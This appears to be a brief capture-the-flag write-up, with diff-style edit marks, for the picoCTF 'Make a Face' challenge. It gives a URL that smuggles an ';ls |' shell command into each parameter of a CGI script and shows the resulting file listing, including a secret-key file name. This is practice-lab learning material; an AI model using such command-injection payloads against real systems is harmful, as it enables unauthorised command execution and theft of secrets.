yoshi-1224/CTF-practices/make_a_face.md

 ```
 http://makeaface.picoctf.com/index.cgi?Head=%3Bls%20%7C&Hair=%3Bls%20%7C&Nose=%3Bls%20%7C&Mouth=%3Bls%20%7C&Eyes=%3Bls%20%7C
 ```
 This will return us a corrupted .bmp file.
-That's fine, just change the extension to .txt, and we should see the output of the "ls" command.
+That's fine, just change the extension to .txt, and we can see the output of the "ls" command.
 The first result looks interesting
 ```
 SECRET_KEY_2b609783951a8665d8c67d721b52b0f8
 css.css